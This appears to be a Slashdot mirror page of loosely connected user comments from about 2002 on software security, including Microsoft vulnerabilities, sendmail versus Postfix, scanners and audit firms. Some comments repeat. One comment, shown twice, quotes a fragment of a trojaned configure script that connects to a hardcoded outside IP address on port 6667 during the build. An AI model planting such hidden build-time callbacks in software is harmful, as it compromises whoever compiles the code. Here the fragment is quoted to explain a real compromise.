Slashdot Mirror

Just as predicted, news media this week seems to be covering the MSIE gopher root exploit with a new focus on Microsoft and their real problems with security, not just the latest hole. One company even goes as far to say that they 'cleaned up Microsoft's mess, once again'. With 18+ un-patched vulnerabilities in line for a fresh MS-fix, this may be the straw that breaks the camel's back.

>What about ./configure scripts?

Actually that seems to be the new trend amongst hax0rs who trojan program distributions. Recently it was reported to bugtraq that monkey.org was compromised and several programs including fragroute and dsniff were altered. Read the explanation of how that happened here.

What did the hax0rs add? A little present in the ./configure script. Among other things it creates a .c file called conftest with some interetsing "checks" in it:

...
+ sa.sin_addr.s_addr = inet_addr("216.80.99.202");
if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) ...

It connects to the above address on port 6667 and does some other nonsense. Then it's compiled and run. The user is none the wiser unless he takes the time to read the ENTIRE ./configure script.

You can find the full diff here.

>What about ./configure scripts?

Actually that seems to be the new trend amongst hax0rs who trojan program distributions. Recently it was reported to bugtraq that monkey.org was compromised and several programs including fragroute and dsniff were altered. Read the explanation of how that happened here.

What did the hax0rs add? A little present in the ./configure script. Among other things it creates a .c file called conftest with some interetsing "checks" in it:

...
+ sa.sin_addr.s_addr = inet_addr("216.80.99.202");
if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) ...

It connects to the above address on port 6667 and does some other nonsense. Then it's compiled and run. The user is none the wiser unless he takes the time to read the ENTIRE ./configure script.

You can find the full diff here.

It is true that open source applications, being openly available on the internet and distributed in the same manner, are susceptible to backdooring and trojaning. Just look at IRSSI or FragRoute.

This risk factor is somewhat mitigated in commercial software, where the distribution is typically through CDs and other trusted media. Of course, someone can still somehow compromise a software developer's network, but it isn't exactly hanging out a sign saying "I'm the source code, hack me!" like the open source projects.

Just imagine, for a minute, how devastating it would be if Sourceforge was hacked and malicious code was inserted into a ton of the projects without anyone noticing for long enough that it could cause real damage? The danger is clear.

This must have been written before they mastered the obtuse concept of image filtering. Oh, wait, everyone wants to see more ads! Feature my eye. Give me IE, with its closed source and security hole of the day feature instead!

Not quite unbreakable.

Look here, or select QNX from the drop down.

Ouch

Wasnt it Oracle who said :- "Oracle9i. Unbreakable. Can't break it. Can't break in."

http://online.securityfocus.com/news/309

Then several days later someone broke it (see article).

This is a very poor publicity stunt where they know they cannot live up to their claims. They are just trying to make a stance against UnitedLinux.

MS added some extra switches to their c++ compiler which was supposed to weed out certain buffer overflows but there were apparently some problems with it. You can read about it here on securityfocus.

No, the article doesn't say that. And from the bugtraq posting:

The attack can be launched via a web page or an HTML mail message which redirect the user to a malicious gopher server when the victim views them. The server can be very minimal, ie. a program that can listen on a TCP port and write a block of data; a fully operational gopher server isn't necessary in order to carry out the attack.

So it seems it is a buffer overflow in handling responses from gopher servers, not in the gopher URL. And they propose the workaround mentioned here of setting a proxy server for gopher that can never be accessed (localhost:someunusedtcpport).

Here is another article from SecurityFocus about the issue, along with the original post to the BugTraq mailing list about this problem.

Here is another article from SecurityFocus about the issue, along with the original post to the BugTraq mailing list about this problem.

Old but never say never

A buffer overflow vulnerability exists in the popular mail client Pine 4.21 (and possibly earlier versions), relating to the function which regularly checks for incoming email.

The real concern here is that this requires no user interaction to exploit.. a target need only be using a vulnerable version of pine. The overflow occurs when the user recieves new email. While typically not yielding root privileges (unless root reads email with pine AS root) this can be used by a remote, anonymous attacker to gain local access to the target host.

This guy doesn't need real security

That's the problem, attitudes like yours. I could care less about sniffing
traffic, that's not the point, the point is to replace WEP with something
better, and the goal isn't to stop people from grabbing credit card details,
it's to prevent Joe Hacker from having an easy leap off point to lauch attacks
against others. In addition, you don't need firewalls on the machines to
prevent traffic sniffing, ipsec tunnels set up on the boxes that pass IP traffic though
the wireless link work just as well. here
and here.

It sounds like if you had your way, he should just put up a couple of apple
airports and forget about it. What myself and others are doing is trying to
implement a reasonable amount of security when it should be implemented, at the
beginning, and not as a duct tape fix after there is an incident and this guy
has to explain why attacks were launched from his network. At any rate, the
openbsd boxes with wireless cards is still the ideal solution, both from a cost
perspective and a security perspective. There have been attacks against all
the commercial wireless access points, ranging from expensive Ciscos to
Breezecom to Linksys. The point isn't to have a totally locked down B1 and
above security implementation, it's to make it the kid with the laptop decide
to move on to Joe User's unsecured Linksys and not this guys network. I also
assume that this guy is looking for a way to keep costs low, and this is the
best way to do it. Somebody earlier mentioned Cisco Catalysts, yea
right

SealBeater

"Slashdot's filters SUCK like HELL."

Maybe you don't really want to post a huge comment that will require readers to click through anyway (it's too big to display at once).

How about posting a link to the ISS Alert instead? Is that so hard?

Actually, as mentioned in the article and by other posters, the Security Focus article quotes Johannes Ullrich of SANS as saying that the worm uses a "brute force" password cracker. This seems to be a misquote since I cannot find anywhere on incidents.org or any other site (besides SlashDot) that claims that the worm uses password cracking. This small detail makes a big difference since the patch only fixes some of the things that the worm does. The first thing the worm does is change the SA password to a random string. What will these poor DBAs do if their password gets cracked, and they can't get into their database?

http://online.securityfocus.com/archive/1/273029

It's not just stupid users. Somebody chose this machine for the business and it's something that they NEED in order to function. Not only that, they may not have a (practical) way to keep it secure when you look at how the machine is really used. I'd sugggest reading the entire thread, because there are more juicy details into the security problems and politics associated with big machines like these.

There is a myth floating around the internet that Windows is less secure than linux. Looking at these statistics from SecurityFocus.com revelas that in 2001 linux had more security vulnerabilities than Windows NT. Windows as a total package still has more incidents than linux, but Windows is deployed much more widely and get a lot more scrutiny.

...I dont know what happened to the hyperlink there - here is the link in text form:

http://online.securityfocus.com/archive/1/254627 /2 002-05-17/2002-05-23/1

And another try at a hyperlink.

Okay, I'm bored today. here are some more. These two lists together may still not be exhaustive, but they are definitely long enough to prove my point that sendmail's security track record is very bad.

Sendmail is fundamentally insecure. It is a single, monolithic process running as root - not necessary for most of its operations. A single buffer overflow would completely compromise the machine running sendmail. It was originally written with little regard to security and has a long lifespan, accumulating cruft. It should be no surprise that it has had several vulnerabilities over the years. (That seems to be just 2001 ones. I'm sure there have been problems between 1988 and 2001; I just don't care enough to find them right now.)

In contrast, Postfix is broken apart into several different processes. Each executes at the minimum privelege necessary to do its job. A process running as an unprivileged user inside a chroot() jail containing no setuid binaries is a minimum risk to the system. The entire system was constructed with a focus on security - both eliminating vulnerabilities like buffer overflows and minimizing their impact should they occur. It has, by comparison, an unblemished security record.

For more information on why Postfix's security is completely superior to sendmail's, please see this page.

Sendmail is fundamentally insecure. It is a single, monolithic process running as root - not necessary for most of its operations. A single buffer overflow would completely compromise the machine running sendmail. It was originally written with little regard to security and has a long lifespan, accumulating cruft. It should be no surprise that it has had several vulnerabilities over the years. (That seems to be just 2001 ones. I'm sure there have been problems between 1988 and 2001; I just don't care enough to find them right now.)

In contrast, Postfix is broken apart into several different processes. Each executes at the minimum privelege necessary to do its job. A process running as an unprivileged user inside a chroot() jail containing no setuid binaries is a minimum risk to the system. The entire system was constructed with a focus on security - both eliminating vulnerabilities like buffer overflows and minimizing their impact should they occur. It has, by comparison, an unblemished security record.

For more information on why Postfix's security is completely superior to sendmail's, please see this page.

Thor Larholm (GreyMagic Software) confirms IE 5 is vulnerable.

For support you might use IEAK to upgrade your sites to 5.5 SP2. Internet Explorer Administration Kit is one thing Microsoft has done right. I used it to distribute 350+ IE installs when Zenworks wouldn't work.

This post to bugtraq claims Windows XP Pro is not vulnerable with the patch. If true this would support Microsoft's argument, "Well, if you upgrade ..."

One of the great things about this system is that it is extremely easy to rate software. Just count the exploits that are possible in the default settings and assign a letter. A college graduate could do it on his fingers. :)

I'm afraid there is a major flaw in such a system. You can't simply count the number of vulnerabilities because they can have different levels of severity. For example, a DoS in psyBNC should not be given the same weight as a remote root vulnerability in WU-FTPD. It just isn't as simple as you make it out to be.

One of the great things about this system is that it is extremely easy to rate software. Just count the exploits that are possible in the default settings and assign a letter. A college graduate could do it on his fingers. :)

I'm afraid there is a major flaw in such a system. You can't simply count the number of vulnerabilities because they can have different levels of severity. For example, a DoS in psyBNC should not be given the same weight as a remote root vulnerability in WU-FTPD. It just isn't as simple as you make it out to be.

So what was this about? Certainly sounds like MPAA throwing its weight around by any means necessary.

This article talks about how a 21 year old software engineer, networking specialist was able to uncap his modem via the ATTBI service

I, myself, used to work for a cable company who's run into situations like this (i'd rather not say who), and have yet not done anything to prevent this from happening in the future

Microsoft Reveals Anti-Disclosure Plan

(emphasis in original)

Five computer security firms join Microsoft to set an official standard for limiting disclosure of software security holes

By Kevin Poulsen, Nov 9 2001 3:04AM

MOUNTAIN VIEW, Calif.--Microsoft and five major computer security companies rounded up the three-day Trusted Computing Forum on Thursday by formally announcing a coalition against full disclosure of computer vulnerability information, ending a week of intense speculation, and immediately sparking controversy.

...

A chief objective of the group is to discourage 'full disclosure,' the common practice of revealing complete details about security holes, even if publication might aide attackers in exploiting them.
'If it becomes hard to release vulnerabilities, that's a good way for Microsoft to get rid of some embarrassment.'
-- Marc Maiffret, eEye Digital Security

Sig: What Happened To The Censorware Project (censorware.org)

I said: I haven't ever used their distro

the response: So how could you possibly have a valid opinion on the subject?

More of what I said that you conveniently left off: I have read a lot about them and have helped some people that use their distro, so I do know about the subject.

If I read from countless sources that Ford Explorers with Firestone tires are dangerous to drive, hear countless stories about how accidents have been caused by such a combination, and know a friend who was in a car wreck because his Firestone tires fell apart on his Ford Explorer, then I think I would know a bit about the subject. I suppose according to you I should start driving Ford Explorers with Firestone tires just to see if I can get in an accident.

what insecurities are you talking about? I mean -- find me a Linux distro that has no exploits.

Obviously you are clueless. Read the SecurityFocus Vulns Stats note the table marked "Number of OS Vulnerabilities by Year". Now lets see you tell me that RedHat's distro is just as secure as other Linux distros. Compare the figures with MS NT/2000--they look close to me...

Qualify that. How do they do things the same way as Microsoft?

Geee...so many choices--where to begin. How about their "configurator" program. I only had to deal with it once--but it was a nasty experience. For one, everytime it was run it would reset the real settings (edited by me in the /etc directory) to whatever it's internal system said they should be--apparently from some other RedHat config file--they made it so that anyone who learned on a normal Linux system would have their settings clobbered as soon as RedHat's program started up.

How about the fact that they use a single script file for every service run at startup? This makes booting any RedHat system painfully-ass slow. That's just like when Microsoft uses single files per item for their "favorites" and cheap symbolic link substitutes.

What about the whole gcc 2.96 mess? Read about it here and here and here

Have you ever used Linux in a professional setting? Package management is essential.

Do you know anything? Slackware uses tar files for their packages--I've never seen any problem with Slackware's package management system.

It doesn't keep track of dependencies, however I usually have to do nodeps with rpms because the program only checks what it has installed--not anything compiled from source or installed through other packaging systems. However, tar could contain a package dependency file inside if it was necessary.

They don't have an apt-get, however that just checks dependencies and downloads files--it could be done using tar files if need be.

A really great packaging system would check the binaries to see what libraries they required and go from there. "This executable requires libuberssl.so.2--not present on system, but found in package ubernetlibs. Do you wish to download and install?" Unfortunately I haven't seen a packaging system like this, and I know the rpm program doesn't do this--it uses the files in /var/lib/rpm and complains if the dependencies aren't listed there.

Does this mean that you resent .debs too?

I would if nearly every Linux developer insisted on using .debs to distribute their binaries, therefore requiring me to install the packaging system on every Linux computer I use, just for the ability of installing binaries.

You can build and install tar'ed & gziped source just like with any other *nix.

Obviously you haven't tried to compile many programs from source. Not only does it take lots more time (try installing XFree86, Mozilla, or GIMP this way), there are also quite a few programs that take much time dicking around with them to even get them to compile. They'll be written for every OS under the sun and very tempormental. Or they'll have stupidly written makefiles. Or they'll have straight out errors in the makefiles/compile scripts/code that takes an hour to correct the problem. Etc. etc. etc... "./configure; make; make install" doesn't always work!

I can go on and on about how dumb your post is, and how unsubstantiated your opinion on RedHat seems to be, but its pretty clear that you're a troll and trying to get a rise out of me.

The same can be said about you. I could go on and on about how idiotic your ideas about what a decent distro is and how to run it. Like how it is bad to just add patches to the kernel for some newfangled gee-whiz buzzword and put it in a major distro. Those patches should only be added by people who really need them--everyone else can wait until the patch goes through the review process and is confirmed stable.

7.3 is apparently still packaged with the vulnerable zlib 1.1.3 version.

And in other related news, Marc Maiffret of eeye reports over at bugtraq that the Macromedia Flash Activex control contains a Buffer overflow

The vuln-dev thread started yesterday, that's the source for the MSNBC story.

http://online.securityfocus.com/archive/82/2002-04 -29/2002-05-05/0

Your recent submissons

2002-05-01 20:23:44 Best Buy (In)security (articles,news) (rejected)

The original message is available at SF's archive.

Maybe things wouldn't be quite so bad if we did recieve updates from Microsoft, directly. I've installed Windows on lots of machines, registered them properly and everything. Never once has anybody from Microsoft phoned, or emailed to let us know about a security problem.

Like most other sysadmins the first notification I get about a problem with a particular program is when I read BugTrack, or NTBugTrack.

Just to keep this on-topic: I'm a sysadmin at a large company. We filter out attatchments as they arrive, via some magic with exim - In the two years that I've been here we've never been hit by a single virus.

Well there isn't much MS can do other than pull Outlook from production. As a Helpdesker, you would definitely tell anyone who was worried about a virus to update defs on spec. This is a good practice, unlike the use of the vectoring Outlook program. Of course, some M$ shill will claim that its not M$ fault and it is a user issue, but that would just be the monkeys aping their master Bill and his minions.

I can suggest two sites you can check out for focussed information on this topic:

securityfocus.com

antionline.com

External audits are good because they bring in experts who focus on finding vulnerabilities in your network. These experts will come armed with a variety of vulnerability assessment tools to perform their audit. The only problem is that it will almost always happen less frequently than vulnerabilities are discovered, so this should only be 1 part of the overall solution.

You should adopt this practice internally, because if the tools are set up to check for vulnerabilities, you can be much more proactive about finding them than simply by scheduling consultants to come every few weeks, months, year. There are a variety of tools available, both freely and commercially.

A good tool will be updated frequently, check a lot of bugs, including the most critical (SANS Top 20, BugTraq, CERT.

Free Tools
SATAN -- Security Administrator Tool for Analyzing Networks
SAINT -- Security Administrator's Integrated Network Tool -- based on SATAN, GNU
SARA -- Security Auditor's Research Assistant -- similar to SATAN/SAINT check the Freshmeat page
NESSUS -- another free tool

Commercial Tools
ISS has a variety of tools avaiable depending on your needs
NeXpose -- try the free demo, great ui, demo only lets you assess 1 IP at a time though :( Here is a review
A Networking Computing article on Vulnerability Assessment tools. Reviews many of the major vendors (so I won't list them all). Includes some of the free tools.
Here is another overview of security tools to get you started.

Agreed. I have found berbee to be extremely knowledgeable. Though I have not recieved an audit from them myself, I have worked with a number of companies that have, and the work has been excellent. One of the advantages to this organization is that they don't have the same potential for conflict of interest that someone like ISS or Cisco may have. Here are some opinions on various others:

Cisco - potential conflict of interest, particularly if you are a Cisco shop (which you probably are, at least partly). The Cisco SPA team has been noted for their skill in the past, probably due to the addition of the Wheel Group team via aquisition. The Wheel Group guys were top-notch (great Fortune article on them from a few years back, if you want more details on them), but I don't know that many of them are still with Cisco.

ISS - absolutely not. Again, conflict of interest. ISS's consulting services are not a core competancy for them. It has been said that ISS has consulting services for the express purpose of moving more product. The mere possibility that this is true disqualifies, much like Cisco. Additionally, I have seen some terrible work from these guys - i.e. missing major weaknesses in policy like failure to enable lockouts on an NT domain.

@stake - honestly, I haven't seen their work in a while, so I don't know if they have improved. However, as of roughly 2 years ago, they were terribly unorganized and extremely expensive. I recall an associate shouting about an exorbitant hourly fee to have a "Junior Engineer" (@stake's term, not mine) take a look at around 50 servers. Additionally, I have seen problems with sales people being less than responsive, and an unwillingness on the part of the technical contact to discuss their methods. If you are a big community booster, you may also question their questionable stance on full open disclosure (more here).

Foundstone - The skill level you can expect from these guys is solid. I have been pleased with the expertise and professionalism of technical contacts from Foundstone, and the management team is certainly very capable in the technical arena. However, there is a catch. In general, I think it is wise to stay away from anyone that sells a "certification" of your security. Business security certifications that are not a direct one-to-one reflection of an accepted standard (ISO/IEC 17799 for instance) tend to be packages designed to sell more services. Who knows what you may have to buy to maintain compliance? I don't, since the web page has only sparse vague comments on their methodology.

Bottom line is this: you want someone that is professional, has quality references, is free from conflicted interests, and most of all, is open with you about their methodology. You want someone that makes you feel comfortable, and treats your potential relationship as an opportunity to educate you and equip your staff to deal with security from an intelligent business decision standpoint. Berbee is not perfect, but I have seen the best blend of these elements in them.

I recommend www.securityfocus.com

According to Netcraft, www.fast.org.uk runs Microsoft Windows 2000, which is vulnerable to initial sequence number guessing.

And herbalifesigns.com is running Apache 1.3.20, the newest version being 1.3.24. ChangeLog here. Hmm... SecurityFocus discusses a misconfiguration of Apache that allows remote users to determine if a given username exists on a system. Although the advisory mentions Red Hat Linux, the default configuration of Apache 1.3.20 is also affected

Steve Gibson is a kook and a crackpot. He's an alarmist, but unfortunately people not "in the know" tend to listen to him (most likely because he is an alarmist). He rails against raw sockets in XP, never bothering to notice that NT (which XP is based upon) has had raw sockets for a long time, and that it's possible to modify the Win9x TCP/IP stack to allow for raw socket-like abilities. Nevermind that raw sockets are only available to administrative users in NT, as with any *nix (problem -- too many users run with administrative rights on NT, which is the equivalent of running as root all the time. This is the true problem, not raw sockets, and should be the one that's addressed). His "Distributed Reflection" DoS is nothing new. Hax0rs and kiddies have been doing it for a while. His GENESIS project is basically poorly-implemented SYN cookie protection. And so on and so on ...

In short, the guy's a nut and only nut's pay attention to him. Try a real security site, like SecurityFocus.

I went to your site about the "myth" of open source software being more secure, and I see where you point to the Security Focus table to try and prove your point. For the *thousandth* time, that table takes into account every single application that ships with a distribution. Can we lump in all the vulnerabilities for MS Office/Outlook, MS Works, SQL Server, and Exchange into the NT/2000 group?

My article does not compare Microsoft products and any Open Source technologies so I am confused as to where this rant stems from. I do remember linking to the Security Focus table as a way to point out that it is disputable to claim that Linux distros are more secure than Windows.

My actual article uses the Vulnerability Archive to compare UNIX flavors and Linux distributions to point out that the license the software is released under does not have as much of a bearing on whether the software is secure or not. So your rant (and +4 score) are rather unwarranted.

The key to user security is to enable it by default. Most people running Win2K at home don't bother modifying their file permissions, closing off unnecessary services, etc. They leave settings at the default and go on their way. If Microsoft made the default installations more secure it would drastically improve the security of its OS. How many times has Security Focus reported on vulnerabilities related to Windows file-sharing? The answer to the problem is to turn it off and let the user decide if they want to turn it on. Outlook scripting, ActiveX, file sharing, Windows messaging, etc. Removing or disabling these services are necessary to secure a Windows box, and to reducing the bad PR that Microsoft receives every time a new vulnerability is discovered.

A person is guilty of computer tampering in the fourth degree when he uses or causes to be used a computer or computer service and having no right to do so he intentionally alters in any manner or destroys computer data or a computer program of another person. Computer tampering in the fourth degree is a class A misdemeanor.

(b) prominently posting written notice adjacent to the computer being utilized by the user

6-3-502. Crimes against intellectual property; penalties.
(a) A person commits a crime against intellectual property if he knowingly and without authorization:
(i) Modifies data, programs or supporting documentation residing or existing internal or external to a computer, computer system or computer network;...
(b) A crime against intellectual property is: (i) A felony punishable by imprisonment for not more than three (3) years, a fine of not more than three thousand dollars ($3,000.00), or both, except as provided in paragraph (ii) of this subsection;

Why not try something a little more reasonable, such as SecurityFocus Pager 3.0? And I blockquote:

"The SecurityFocus Pager is a dynamic application designed to help system administrators track content of interest to them on the SecurityFocus.com web site. It affords the system administrator the ability to select categories of interest and tracks them automatically, notifying the administrator when new content arrives. The Security Focus Pager displays short descriptive summaries allowing the administrator to stay updated on relevant issues in the security world, including vulnerabilities, news articles, software releases, and other important information."

Or you can just do an apt-get update; apt-get upgrade; once in a while like I do. ;)

Not necessarily so. Check out a recent bugtraq posting that claims that keys up to and including 1024 bit are easily crackable by government types.

Even with the recent evolution in factoring, there's no match for a properly set-up pgp/gpg.

Why bother to rely on their niceness when you can easily be rather sure nobody reads your important mails?

According to the Security Focus article the affected parking servers had been outsourced to Interland. Not really surprising, since Interland has left their servers vulnerable to various vulnerabilities for months at times.